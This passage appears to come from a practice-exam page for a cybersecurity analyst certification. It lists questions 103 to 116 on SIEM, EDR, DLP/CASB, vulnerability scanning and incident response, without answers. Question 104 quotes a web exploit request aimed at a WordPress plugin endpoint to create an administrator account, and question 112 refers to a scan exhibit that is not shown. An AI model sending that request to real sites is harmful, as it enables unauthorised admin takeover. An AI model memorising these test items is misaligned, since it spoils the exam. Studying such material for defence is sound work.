A.

Registry editing

B.

Network mapping

C.

Timeline analysis

D.

Write blocking

Question 103

After a security assessment was done by a third-party consulting firm, the cybersecurity program recommended integrating DLP and CASB to reduce analyst alert fatigue. Which of the following is the best possible outcome that this effort hopes to achieve?

Options:

A.

SIEM ingestion logs are reduced by 20%.

B.

Phishing alerts drop by 20%.

C.

False positive rates drop to 20%.

D.

The MTTR decreases by 20%.

Question 104

An analyst has received an IPS event notification from the SIEM stating an IP address, which is known to be malicious, has attempted to exploit a zero-day vulnerability on several web servers. The exploit contained the following snippet:

/wp-json/trx_addons/V2/get/sc_layout?sc=wp_insert_user&role=administrator

Which of the following controls would work best to mitigate the attack represented by this snippet?

Options:

A.

Limit user creation to administrators only.

B.

Limit layout creation to administrators only.

C.

Set the directory trx_addons to read only for all users.

D.

Set the directory v2 to read only for all users.

Question 105

Which of the following threat-modeling procedures is in the OWASP Web Security Testing Guide?

Options:

A.

Review Of security requirements

B.

Compliance checks

C.

Decomposing the application

D.

Security by design

Question 106

A SOC analyst recommends adding a layer of defense for all endpoints that will better protect against external threats regardless of the device's operating system. Which of the following best meets this

requirement?

Options:

A.

SIEM

B.

CASB

C.

SOAR

D.

EDR

Question 107

A systems administrator receives reports of an internet-accessible Linux server that is running very sluggishly. The administrator examines the server, sees a high amount of memory utilization, and suspects a DoS attack related to half-open TCP sessions consuming memory. Which of the following tools would best help to prove whether this server was experiencing this behavior?

Options:

A.

Nmap

B.

TCPDump

C.

SIEM

D.

EDR

Question 108

Which Of the following techniques would be best to provide the necessary assurance for embedded software that drives centrifugal pumps at a power Plant?

Options:

A.

Containerization

B.

Manual code reviews

C.

Static and dynamic analysis

D.

Formal methods

Question 109

An analyst is suddenly unable to enrich data from the firewall. However, the other open intelligence feeds continue to work. Which of the following is the most likely reason the firewall feed stopped working?

Options:

A.

The firewall service account was locked out.

B.

The firewall was using a paid feed.

C.

The firewall certificate expired.

D.

The firewall failed open.

Question 110

A security administrator has been notified by the IT operations department that some vulnerability reports contain an incomplete list of findings. Which of the following methods should be used to resolve

this issue?

Options:

A.

Credentialed scan

B.

External scan

C.

Differential scan

D.

Network scan

Question 111

AXSS vulnerability was reported on one of the non-sensitive/non-mission-critical public websites of a company. The security department confirmed the finding and needs to provide a recommendation to the application owner. Which of the following recommendations will best prevent this vulnerability from being exploited? (Select two).

Options:

A.

Implement an IPS in front of the web server.

B.

Enable MFA on the website.

C.

Take the website offline until it is patched.

D.

Implement a compensating control in the source code.

E.

Configure TLS v1.3 on the website.

F.

Fix the vulnerability using a virtual patch at the WAF.

Question 112

An analyst needs to provide recommendations based on a recent vulnerability scan:

Which of the following should the analyst recommend addressing to ensure potential vulnerabilities are identified?

Options:

A.

SMB use domain SID to enumerate users

B.

SYN scanner

C.

SSL certificate cannot be trusted

D.

Scan not performed with admin privileges

Question 113

Which of the following items should be included in a vulnerability scan report? (Choose two.)

Options:

A.

Lessons learned

B.

Service-level agreement

C.

Playbook

D.

Affected hosts

E.

Risk score

F.

Education plan

Question 114

A new cybersecurity analyst is tasked with creating an executive briefing on possible threats to the organization. Which of the following will produce the data needed for the briefing?

Options:

A.

Firewall logs

B.

Indicators of compromise

C.

Risk assessment

D.

Access control lists

Question 115

Which of the following explains the importance of a timeline when providing an incident response report?

Options:

A.

The timeline contains a real-time record of an incident and provides information that helps to simplify a postmortem analysis.

B.

An incident timeline provides the necessary information to understand the actions taken to mitigate the threat or risk.

C.

The timeline provides all the information, in the form of a timetable, of the whole incident response process including actions taken.

D.

An incident timeline presents the list of commands executed by an attacker when the system was compromised, in the form of a timetable.

Question 116

Which of the following actions would an analyst most likely perform after an incident has been investigated?

Options:

A.

Risk assessment

B.

Root cause analysis

C.

Incident response plan

D.

Tabletop exercise

Demo: 116 questions
Total 390 questions